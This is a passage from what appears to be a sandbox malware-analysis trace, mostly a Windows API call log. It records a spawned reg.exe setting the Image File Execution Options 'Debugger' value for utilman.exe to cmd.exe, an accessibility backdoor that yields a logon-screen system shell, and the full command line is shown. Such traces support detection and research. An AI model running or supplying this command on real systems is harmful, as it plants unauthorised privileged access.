[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 204 os_tid = 0x4f8 Thread: id = 205 os_tid = 0x12b8 Thread: id = 206 os_tid = 0xd60 Thread: id = 207 os_tid = 0xe70 Thread: id = 208 os_tid = 0x9d0 Process: id = "13" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x272aa000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 209 os_tid = 0x710 [0257.078] GetModuleHandleA (lpModuleName=0x0) returned 0x890000 [0257.078] __set_app_type (_Type=0x1) [0257.078] __p__fmode () returned 0x776f3c14 [0257.078] __p__commode () returned 0x776f49ec [0257.079] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x89c780) returned 0x0 [0257.079] __wgetmainargs (in: _Argc=0x89d028, _Argv=0x89d02c, _Env=0x89d030, _DoWildCard=0, _StartInfo=0x89d03c | out: _Argc=0x89d028, _Argv=0x89d02c, _Env=0x89d030) returned 0 [0257.079] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0257.086] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0257.086] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x12f9ac | out: phkResult=0x12f9ac*=0x0) returned 0x2 [0257.087] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0257.087] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437bc8 [0257.087] lstrlenW (lpString="") returned 0 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x2) returned 0x434760 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434498 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437c88 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434258 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x433e38 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x433e58 [0257.087] GetProcessHeap () returned 0x430000 [0257.087] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x433e78 [0257.087] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437ca0 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434518 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434538 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434558 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x4349f8 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437cb8 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434a18 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434a38 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434a58 [0257.088] GetProcessHeap () returned 0x430000 [0257.088] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x14) returned 0x434ba8 [0257.088] SetThreadUILanguage (LangId=0x0) returned 0x2d0409 [0257.092] GetProcessHeap () returned 0x430000 [0257.092] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437cd0 [0257.093] _memicmp (_Buf1=0x437cd0, _Buf2=0x891b8c, _Size=0x7) returned 0 [0257.093] GetProcessHeap () returned 0x430000 [0257.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x1e) returned 0x433bf8 [0257.093] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.093] GetProcessHeap () returned 0x430000 [0257.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x10) returned 0x437d30 [0257.093] _memicmp (_Buf1=0x437d30, _Buf2=0x891b8c, _Size=0x7) returned 0 [0257.093] GetProcessHeap () returned 0x430000 [0257.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0xbc) returned 0x433c20 [0257.093] _vsnwprintf (in: _Buffer=0x433bf8, _BufferCount=0xe, _Format="|%s|", _ArgList=0x12f8c0 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0257.093] _vsnwprintf (in: _Buffer=0x433c20, _BufferCount=0x5d, _Format="|%s|", _ArgList=0x12f8c0 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0257.093] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0257.093] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe|") returned 92 [0257.093] RtlRestoreLastWin32Error () returned 0x2da000 [0257.093] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.093] GetProcessHeap () returned 0x430000 [0257.093] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0xb6) returned 0x4342d8 [0257.093] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.093] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0257.093] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.094] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.095] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.095] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.096] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.096] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.096] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0257.097] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0257.097] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.097] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.097] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0257.097] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.097] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0257.098] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0257.098] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0257.098] GetProcessHeap () returned 0x430000 [0257.098] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x28) returned 0x439448 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0257.098] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0257.098] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\utilman.exe" [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\Image File Execution Options\\utilman.exe" [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="Image File Execution Options\\utilman.exe", wMatch=0x5c) returned="\\utilman.exe" [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] StrChrIW (lpStart="utilman.exe", wMatch=0x5c) returned 0x0 [0257.099] RtlRestoreLastWin32Error () returned 0x2da000 [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] RtlRestoreLastWin32Error () returned 0x2da000 [0257.099] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 85 [0257.099] GetProcessHeap () returned 0x430000 [0257.099] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0xac) returned 0x439478 [0257.099] GetProcessHeap () returned 0x430000 [0257.099] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0xd8) returned 0x439530 [0257.099] GetProcessHeap () returned 0x430000 [0257.099] GetProcessHeap () returned 0x430000 [0257.099] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x439448) returned 1 [0257.100] GetProcessHeap () returned 0x430000 [0257.100] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x439448) returned 0x28 [0257.100] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439448) returned 1 [0257.100] GetProcessHeap () returned 0x430000 [0257.100] GetProcessHeap () returned 0x430000 [0257.100] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x4342d8) returned 1 [0257.100] GetProcessHeap () returned 0x430000 [0257.100] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4342d8) returned 0xb6 [0257.100] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4342d8) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0257.100] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0257.100] lstrlenW (lpString="Debugger") returned 8 [0257.100] GetProcessHeap () returned 0x430000 [0257.101] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x12) returned 0x4399c0 [0257.101] lstrlenW (lpString="Debugger") returned 8 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0257.101] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0257.101] lstrlenW (lpString="REG_SZ") returned 6 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0257.101] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0257.101] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0257.101] LocalFree (hMem=0x437c70) returned 0x0 [0257.102] RtlRestoreLastWin32Error () returned 0x2da000 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0257.102] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0257.102] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0257.102] GetProcessHeap () returned 0x430000 [0257.102] RtlAllocateHeap (HeapHandle=0x430000, Flags=0xc, Size=0x34) returned 0x4342d8 [0257.102] RtlRestoreLastWin32Error () returned 0x2da000 [0257.102] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x12f95c, lpdwDisposition=0x12f92c | out: phkResult=0x12f95c*=0xe0, lpdwDisposition=0x12f92c*=0x1) returned 0x0 [0257.103] RegQueryValueExW (in: hKey=0xe0, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0257.104] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0257.104] RegSetValueExW (in: hKey=0xe0, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="%windir%\\system32\\cmd.exe", cbData=0x34 | out: lpData="%windir%\\system32\\cmd.exe") returned 0x0 [0257.104] RegCloseKey (hKey=0xe0) returned 0x0 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x439478) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x439478) returned 0xac [0257.105] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439478) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x439530) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x439530) returned 0xd8 [0257.105] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x439530) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x4399c0) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4399c0) returned 0x12 [0257.105] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4399c0) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] HeapValidate (hHeap=0x430000, dwFlags=0x0, lpMem=0x4342d8) returned 1 [0257.105] GetProcessHeap () returned 0x430000 [0257.105] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4342d8) returned 0x34 [0257.105] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x4342d8) returned 1 [0257.105] RtlRestoreLastWin32Error () returned 0x2da000 [0257.105] GetLastError () returned 0x0 [0257.105] FormatMessageW (in: dwFlags=0x1300, 